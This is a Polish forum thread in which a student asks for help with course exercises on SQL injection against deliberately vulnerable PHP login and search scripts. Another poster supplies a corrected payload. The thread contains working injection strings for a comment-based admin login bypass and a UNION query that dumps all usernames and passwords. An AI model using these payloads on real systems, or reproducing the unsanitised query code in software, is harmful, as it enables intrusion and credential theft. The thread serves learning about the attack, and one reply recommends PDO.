sql injection Opcje

[szokmen]

Witam,
dostałem do zrobienia ćwiczenia które mam wykonać na podstawie materiałów dołączonych do ćwiczeń. Jednak nie mogę zrobić dwóch zadań:
Pierwsze:
Używając skryptu P02.php zalogować się na konto admin wykorzystując komentowanie niechcianego fragmentu zapytania.

Skrypt P02.php;

[PHP] pobierz, plaintext 
<?php
include('cfg.php');
$z="SELECT id FROM uzytkownicy WHERE login='$login' AND haslo='$haslo'";
echo($z.'<br>');
$q=mysql_query($z);
$txt=mysql_fetch_array($q);
if (isset($txt['id'])) {big('Zalogowany! ID: '.$txt['id']);} else {big('Error');}
?>
[PHP] pobierz, plaintext 

cfg.php to tylko połączenie z bazą.
Według materiałów powinno to zostać zrobione mniej więcej tak zapytanie w P02.php powinniśmy zmienić na:

[SQL] pobierz, plaintext 
SELECT  id  FROM  użytkownicy WHERE  login =’/*
[SQL] pobierz, plaintext 

a w przeglądarce internetowej powinniśmy wpisać htp://adres/lokalizacja/nazwa_skryptu.php?login=admin'/* (oczywiście powinny być dwa "t" w http.)

Drugie zadanie:
Wykorzystując umiejętności z poprzednich zadań oraz funkcję PHP concat, a także skrypt P04.php wydobyć z bazy wszystkie loginy i hasła znajdujące się w bazie MySQL.

Skrypt P04.php:

[PHP] pobierz, plaintext 
<?php
include('cfg.php');
$z="SELECT login FROM uzytkownicy WHERE login LIKE '$login%' LIMIT 2";
echo($z.'<br>');
$q=mysql_query($z);
echo('<br>Znalezione rekordy:<br>');
while ($txt=mysql_fetch_array($q)){
	echo($txt['login'].'<br>');
}
?>
[PHP] pobierz, plaintext 

według materiałów powinno to zostać zrobione tak, zapytanie w skrypcie P04.php zamieniamy na:

[SQL] pobierz, plaintext 
SELECT  login  FROM  użytkownicy WHERE  login LIKE ’%’ AND 1=2 UNION SELECT haslo from uzytkownicy /* LIMIT 2
[SQL] pobierz, plaintext 

a w przeglądarkę wpisujemy htp://adres/lokalizacja/nazwa_skryptu.php?login=%' and 1=2 union select haslo from
uzytkownicy /*

Proszę o wskazówki co robię nie tak.

[Fifi209]

w drugim ma być:

' and 1=2 union select concat_ws(':',login,haslo) /*

a w pierwszym powinno śmigać.
Zobacz czy nie masz włączonego magic_quotes

[kiler129]

Widzę, że uczysz się programować. Wyrób sobie dobre nawyki jak np. używanie PDO zamiast mysql_*().
PHP staje się coraz bardziej obiektowym językiem i niektóre funckje stają sie depraced, poleganie na np. magic quotes się niedługo skończy

[Fifi209]

Widzę, że uczysz się programować. Wyrób sobie dobre nawyki jak np. używanie PDO zamiast mysql_*().
PHP staje się coraz bardziej obiektowym językiem i niektóre funckje stają sie depraced, poleganie na np. magic quotes się niedługo skończy

Przeczytaj jego post jeszcze kilka razy. Jak dla mnie on uczy się o atakach SQL Injection i do końca nie rozumie materiału. ;]

[kiler129]

Faktycznie
To tK jest jak się pisze po nocach kod i odłożone na forum;)

A zadanie przypomina mi takowe z tdhack wiec pytanie o rozwiazanie jest wojen hehehhe